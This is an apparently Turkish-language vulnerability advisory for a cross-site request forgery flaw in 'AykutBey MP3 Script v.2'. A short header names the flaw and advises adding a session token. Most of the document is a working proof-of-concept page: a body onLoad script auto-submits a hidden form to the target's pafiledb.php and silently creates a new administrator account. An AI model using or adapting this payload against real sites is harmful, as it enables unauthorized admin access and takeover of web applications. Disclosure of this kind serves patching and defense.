< ------------------- header data start ------------------- >

#############################################################

# Application Name : AykutBey MP3 Script v.2

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin haklarina sahip kullanici eklenebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir

# author : Bug Researchers


#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onLoad=Submit();>
<script>function Submit(){document.Sh0cK.submit();}</script>

<form action=http://www.Site.com/[Path]/pafiledb.php name=Sh0cK method=post>
<input type=text size=50 name=form[username] class=forminput value=Kullaniciadi>
<input type=text size=50 name=form[email] class=forminput value=Mail>
<input type=text size=50 name=form[password] class=forminput value=Sifre>
<select name=form[status] class=forminput><option value=1 selected>Hayir</option><option value=1>Evet</option></select>
<input type=hidden name=action value=admin><input type=hidden name=ad value=admins><input type=hidden name=admins value=add><input type=hidden

name=add value=do><input type=submit value=Lütfen Bekleyiniz.></form>

< -- bug code end of -- >